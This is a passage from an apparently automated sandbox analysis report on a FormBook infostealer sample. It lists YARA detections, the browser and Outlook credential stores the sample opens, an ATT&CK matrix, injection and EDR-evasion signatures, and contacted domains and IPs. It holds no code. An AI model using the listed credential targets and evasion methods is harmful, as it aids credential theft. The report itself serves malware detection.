                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ungziped_file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\SndVol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ungziped_file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.3512102451.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3514314819.00000000052F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1396809453.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1393148021.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3509810870.00000000032A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3512178205.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1400004101.0000000001600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3512080555.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		131
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		51
                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials123
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633496 Sample: ungziped_file.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 42 www.ticquan.xyz 2->42 44 www.matindi.xyz 2->44 46 15 other IPs or domains 2->46 60 Suricata IDS alerts for network traffic 2->60 62 Antivirus detection for URL or domain 2->62 64 Multi AV Scanner detection for submitted file 2->64 68 5 other signatures 2->68 10 ungziped_file.exe 4 2->10         started        14 svchost.exe 1 1 2->14         started        signatures3 66 Performs DNS queries to domains with low reputation 44->66 process4 dnsIp5 40 C:\Users\user\...\ungziped_file.exe.log, ASCII 10->40 dropped 74 Adds a directory exclusion to Windows Defender 10->74 17 ungziped_file.exe 10->17         started        20 powershell.exe 23 10->20         started        22 ungziped_file.exe 10->22         started        54 127.0.0.1 unknown unknown 14->54 file6 signatures7 process8 signatures9 56 Maps a DLL or memory area into another process 17->56 24 K1A8707LwM6.exe 17->24 injected 58 Loading BitLocker PowerShell Module 20->58 27 WmiPrvSE.exe 20->27         started        29 conhost.exe 20->29         started        process10 signatures11 72 Found direct / indirect Syscall (likely to bypass EDR) 24->72 31 SndVol.exe 13 24->31         started        process12 signatures13 76 Tries to steal Mail credentials (via file / registry access) 31->76 78 Tries to harvest and steal browser information (history, passwords, etc) 31->78 80 Modifies the context of a thread in another process (thread injection) 31->80 82 3 other signatures 31->82 34 K1A8707LwM6.exe 31->34 injected 38 firefox.exe 31->38         started        process14 dnsIp15 48 an05-prod-x.cdn-ng.net 103.42.144.142, 49705, 49706, 49707 WSN-TW-NET-ASWorldstarNetworkTW Taiwan; Republic of China (ROC) 34->48 50 www.gnlokn.info 47.83.1.90, 49735, 49736, 49737 VODANETInternationalIP-BackboneofVodafoneDE United States 34->50 52 9 other IPs or domains 34->52 70 Found direct / indirect Syscall (likely to bypass EDR) 34->70 signatures16

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.